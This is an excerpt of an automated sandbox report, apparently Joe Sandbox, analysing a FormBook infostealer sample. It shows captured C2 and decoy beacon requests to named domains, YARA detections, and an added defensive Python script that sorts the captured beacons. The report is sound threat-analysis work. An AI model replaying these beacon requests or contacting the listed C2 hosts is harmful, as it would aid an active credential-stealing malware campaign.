          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Oct 2021 17:14:19 GMTServer: ApacheContent-Length: 258Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 64 6f 69 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.rdoi.top Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmllast-modified: Tue, 09 Jul 2019 06:18:14 GMTetag: "999-5d2431a6-22b54e502ae80759;;;"accept-ranges: bytescontent-length: 2457date: Wed, 27 Oct 2021 17:14:25 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0a 20 20 20 20 20 20 20 20 5b 6e 67 5c 3a 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 64 61 74 61 2d 6e 67 2d 63 
6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 78 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 78 2d 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 68 69 64 65 3a 6e 6f 74 28 2e 6e 67 2d 68 69 64 65 2d 61 6e 69 6d 61 74 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 6e 67 5c 3a 66 6f 72 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 69 6d 61 74 65 2d 73 68 69 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 63 68 6f 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 2
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Wed, 27 Oct 2021 17:14:36 GMTContent-Type: text/htmlContent-Length: 169Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.1</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/html; charset=UTF-8Content-Length: 884Connection: closeP3P: CP="CAO PSA OUR"Expires: Thu, 01 Jan 1970 00:00:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 56 69 72 75 73 2f 53 70 79 77 61 72 65 20 44 6f 77 6e 6c 6f 61 64 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 50 52 41 47 4d 41 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 2d 43 41 43 48 45 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 20 20 23 63 6f 6e 74 65 6e 74 20 7b 0d 0a 20 20 20 20 62 6f 72 64 65 72 3a 33 70 78 20 73 6f 6c 69 64 23 61 61 61 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 31 2e 35 65 6d 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 31 2e 35 65 6d 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 0d 0a 20 20 7d 0d 0a 20 20 68 31 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 65 6d 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 31 39 36 33 39 30 3b 0d 0a 20 20 7d 0d 0a 20 20 62 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 31 39 36 33 39 30 3b 0d 0a 20 20 7d 0d 
0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 65 37 65 38 65 39 22 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 3c 68 31 3e 56 69 72 75 73 2f 53 70 79 77 61 72 65 20 44 6f 77 6e 6c 6f 61 64 20 42 6c 6f 63 6b 65 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 44 6f 77 6e 6c 6f 61 64 20 6f 66 20 74 68 65 20 76 69 72 75 73 2f 73 70 79 77 61 72 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 63 6f 6d 70 61 6e 79 20 70 6f 6c 69 63 79 2e 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 72 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 69 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 69 6e 20 65 72 72 6f 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 3c 62 3e 46 69 6c 65 20 6e 61 6d 65 3a 3c 2f 62 3e 20 20 3c 2f 70 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Virus/Spyware Download Bloc
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 27 Oct 2021 17:15:07 GMTContent-Type: text/htmlContent-Length: 275ETag: "61797039-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
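The configuration in the Malware Configuration section names one C2 path (www.esyscoloradosprings.com/fqiq/) and 64 decoy domains, and the GETs captured above go to nine different hosts with the same /fqiq/ path, no User-Agent, and a 7-byte all-zero body on a GET. The following is an added example, not part of the Joe Sandbox report: it loads the extracted configuration, rebuilds each captured request in wire form, and classifies every request as a real C2 check-in, a decoy beacon, or unknown, while also reporting which query parameters are identical across all requests. The decoy list is trimmed to the entries the captured traffic needs, and the CRLF framing of the requests is reconstructed, since the report prints each request's headers run together.

```python
"""Added example, not part of the Joe Sandbox report: triage the captured
FormBook check-ins against the extracted configuration.  The config names
one real C2 and a long decoy list; the bot beacons to decoys as well as the
C2, so the first question is which of the observed GETs actually reached
the C2, and which request features are shared by all of them."""
import json
from urllib.parse import urlsplit

# Extracted configuration from the report.  The decoy list is trimmed to
# the entries needed here; the report lists 64.
CONFIG_JSON = '''{"C2 list": ["www.esyscoloradosprings.com/fqiq/"],
 "decoy": ["isshinn1.com", "rdoi.top", "megacinema.club",
           "passiverewardssystems.com", "sosoon.store", "24000words.com",
           "healthyweekendtips.com", "thedusi.com", "qywyfeo8.xyz"]}'''


def load_config(text):
    """Return ({c2_host: c2_path}, {decoy domains}) from the extractor JSON."""
    cfg = json.loads(text)
    c2 = {}
    for entry in cfg["C2 list"]:
        parts = urlsplit("http://" + entry)      # entries carry no scheme
        c2[parts.hostname.lower()] = parts.path
    return c2, {d.lower() for d in cfg["decoy"]}


def make_request(host, query):
    """Rebuild one captured request in wire form: GET, no User-Agent,
    Connection: close, and the seven zero bytes the report shows as
    'Data Raw: 00 00 00 00 00 00 00'.  The CRLF framing is reconstructed."""
    return (f"GET /fqiq/?{query} HTTP/1.1\r\nHost: {host}\r\n"
            "Connection: close\r\n\r\n").encode() + b"\x00" * 7


# Host and query string of each GET in the report's Networking section.
CAPTURED = [
    make_request("www.isshinn1.com", "7ntl=P0DdOFE&t4=e+AZlQHvj0Nkc3ZxJNwaiuJVmPOcAOQ1LYKBIXTaam/aWkR0DWWiTlTQ8bI2AJlImQfa"),
    make_request("www.rdoi.top", "t4=DrMAfIISwi8U79fOFtAc8vb7WUYlKccaGhxOihVWZlb0OyUiTIjpechuj+pZJYn+REB0&7ntl=P0DdOFE"),
    make_request("www.megacinema.club", "7ntl=P0DdOFE&t4=VbjQ+CrtVqSc6MjyqwiIrbcVi4OLgBoaswazXZOO5Xcx+UM7PWGlfM9NMvQxrE1YfGIg"),
    make_request("www.passiverewardssystems.com", "t4=S7zufRYckdaRFFMeU2i8sPw6oODMRAGo5BePfs9LVZnwdcptwuHxEcdCnQUJ/1YT2L5I&7ntl=P0DdOFE"),
    make_request("www.sosoon.store", "7ntl=P0DdOFE&t4=37G2EJO5ajdFCPilMv01MVSoTtyG1cwu/oJiLg0B75A/3Z+IhDAr8cszuRbw5Svr7Hw7"),
    make_request("www.esyscoloradosprings.com", "t4=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8PStfGU22/Dk&7ntl=P0DdOFE"),
    make_request("www.24000words.com", "t4=iMQAtVYJ5rSxYH2x6+rXrM9PD6xR/OhOVeuwgCEnac3/UPHz+dInplYvIFxL5JBy9ykq&7ntl=P0DdOFE"),
    make_request("www.healthyweekendtips.com", "7ntl=P0DdOFE&t4=nFNrhldUoBq3vLmHBw1UbSwwpktYb/50pHGi08ob/NjKnaohHgqGQwabDGB1W4+ZaPC+"),
    make_request("www.thedusi.com", "7ntl=P0DdOFE&t4=t9SsZ/MS+FgAljVT/evJl5FFrjjg4DD8GLJQPa9p2h0JK2Hk2yZve+gJxH10C5UF88V/"),
]


def parse_request(raw):
    """Minimal HTTP/1.1 request parser: request line, headers, body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    # Split the query by hand: the t4 value is base64-like and contains
    # '+' and '/', which parse_qs would turn into spaces and decode.
    params = dict(p.split("=", 1) for p in parts.query.split("&") if "=" in p)
    return {"method": method, "path": parts.path, "params": params,
            "headers": headers, "body": body}


def triage(raw, c2, decoys):
    """Classify one request as c2/decoy/unknown and list its oddities."""
    req = parse_request(raw)
    host = req["headers"].get("host", "").lower()
    findings = []
    if "user-agent" not in req["headers"]:
        findings.append("no User-Agent")
    if req["method"] == "GET" and req["body"]:
        findings.append(f"GET with {len(req['body'])}-byte body")
    if host in c2 and req["path"] == c2[host]:
        role = "c2"
    elif any(host == d or host.endswith("." + d) for d in decoys):
        role = "decoy"
    else:
        role = "unknown"
    return {"host": host, "role": role, "path": req["path"],
            "params": req["params"], "findings": findings}


def summarize(raws, c2, decoys):
    """Per-request verdicts, a role histogram, and the query parameters
    whose value is identical in every request (candidate campaign pivots)."""
    results = [triage(r, c2, decoys) for r in raws]
    roles = {}
    for r in results:
        roles[r["role"]] = roles.get(r["role"], 0) + 1
    first = results[0]["params"]
    constant = {k: v for k, v in first.items()
                if all(r["params"].get(k) == v for r in results)}
    return results, roles, constant


if __name__ == "__main__":
    c2, decoys = load_config(CONFIG_JSON)
    results, roles, constant = summarize(CAPTURED, c2, decoys)
    for r in results:
        print(f"{r['role']:7} {r['host']:32} {', '.join(r['findings'])}")
    print("roles:", roles, "constant params:", constant)
```

Run against the nine captured GETs, only the request to www.esyscoloradosprings.com is a C2 check-in; the other eight are decoy beacons, which is why the Snort rule fires on several destination IPs that are not the C2. Every request shares the same 7ntl=P0DdOFE parameter while t4 changes per request, so 7ntl is the value worth pivoting on across samples, and the missing User-Agent plus the zero-byte GET body are the traits a network detection can key on independently of the host list.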
          Source: CtTYTpaAKA.exe, 00000002.00000002.296214054.00000000029A1000.00000004.00000001.sdmp String found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
          Source: cscript.exe, 0000000A.00000002.560650988.0000000004DC2000.00000004.00020000.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Open
          Source: cscript.exe, 0000000A.00000002.560650988.0000000004DC2000.00000004.00020000.sdmp String found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css
          Source: cscript.exe, 0000000A.00000002.560650988.0000000004DC2000.00000004.00020000.sdmp String found in binary or memory: https://pepabo.com/
          Source: cscript.exe, 0000000A.00000002.560650988.0000000004DC2000.00000004.00020000.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.js
          Source: unknown DNS traffic detected: queries for: www.isshinn1.com
          Source: global traffic HTTP traffic detected: GET /fqiq/?7ntl=P0DdOFE&t4=e+AZlQHvj0Nkc3ZxJNwaiuJVmPOcAOQ1LYKBIXTaam/aWkR0DWWiTlTQ8bI2AJlImQfa HTTP/1.1 Host: www.isshinn1.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /fqiq/?t4=DrMAfIISwi8U79fOFtAc8vb7WUYlKccaGhxOihVWZlb0OyUiTIjpechuj+pZJYn+REB0&7ntl=P0DdOFE HTTP/1.1 Host: www.rdoi.top Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /fqiq/?7ntl=P0DdOFE&t4=VbjQ+CrtVqSc6MjyqwiIrbcVi4OLgBoaswazXZOO5Xcx+UM7PWGlfM9NMvQxrE1YfGIg HTTP/1.1 Host: www.megacinema.club Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /fqiq/?t4=S7zufRYckdaRFFMeU2i8sPw6oODMRAGo5BePfs9LVZnwdcptwuHxEcdCnQUJ/1YT2L5I&7ntl=P0DdOFE HTTP/1.1 Host: www.passiverewardssystems.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /fqiq/?7ntl=P0DdOFE&t4=37G2EJO5ajdFCPilMv01MVSoTtyG1cwu/oJiLg0B75A/3Z+IhDAr8cszuRbw5Svr7Hw7 HTTP/1.1 Host: www.sosoon.store Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /fqiq/?t4=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8PStfGU22/Dk&7ntl=P0DdOFE HTTP/1.1 Host: www.esyscoloradosprings.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /fqiq/?t4=iMQAtVYJ5rSxYH2x6+rXrM9PD6xR/OhOVeuwgCEnac3/UPHz+dInplYvIFxL5JBy9ykq&7ntl=P0DdOFE HTTP/1.1 Host: www.24000words.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /fqiq/?7ntl=P0DdOFE&t4=nFNrhldUoBq3vLmHBw1UbSwwpktYb/50pHGi08ob/NjKnaohHgqGQwabDGB1W4+ZaPC+ HTTP/1.1 Host: www.healthyweekendtips.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /fqiq/?7ntl=P0DdOFE&t4=t9SsZ/MS+FgAljVT/evJl5FFrjjg4DD8GLJQPa9p2h0JK2Hk2yZve+gJxH10C5UF88V/ HTTP/1.1 Host: www.thedusi.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match; File source: 5.2.CtTYTpaAKA.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 5.0.CtTYTpaAKA.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 5.0.CtTYTpaAKA.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 5.2.CtTYTpaAKA.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 5.0.CtTYTpaAKA.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 5.0.CtTYTpaAKA.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 5.0.CtTYTpaAKA.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 2.2.CtTYTpaAKA.exe.3b15be0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 2.2.CtTYTpaAKA.exe.3acb9c0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 00000007.00000000.325485769.000000000FAD4000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000005.00000002.354912343.00000000012B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000007.00000000.341621895.000000000FAD4000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000002.00000002.296512785.00000000039A9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000005.00000000.293661592.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 0000000A.00000002.557804622.00000000007B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000005.00000000.293144075.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 0000000A.00000002.557379114.00000000005B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000005.00000002.354450350.0000000000F40000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 5.2.CtTYTpaAKA.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.CtTYTpaAKA.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 5.0.CtTYTpaAKA.exe.400000.4.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.CtTYTpaAKA.exe.400000.4.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 5.0.CtTYTpaAKA.exe.400000.8.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.CtTYTpaAKA.exe.400000.8.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 5.2.CtTYTpaAKA.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.CtTYTpaAKA.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 5.0.CtTYTpaAKA.exe.400000.6.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.CtTYTpaAKA.exe.400000.6.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 5.0.CtTYTpaAKA.exe.400000.6.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.CtTYTpaAKA.exe.400000.6.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 5.0.CtTYTpaAKA.exe.400000.8.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.CtTYTpaAKA.exe.400000.8.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 2.2.CtTYTpaAKA.exe.3b15be0.3.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.CtTYTpaAKA.exe.3b15be0.3.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 2.2.CtTYTpaAKA.exe.3acb9c0.2.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.CtTYTpaAKA.exe.3acb9c0.2.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.325485769.000000000FAD4000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.325485769.000000000FAD4000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.354912343.00000000012B0000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.354912343.00000000012B0000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
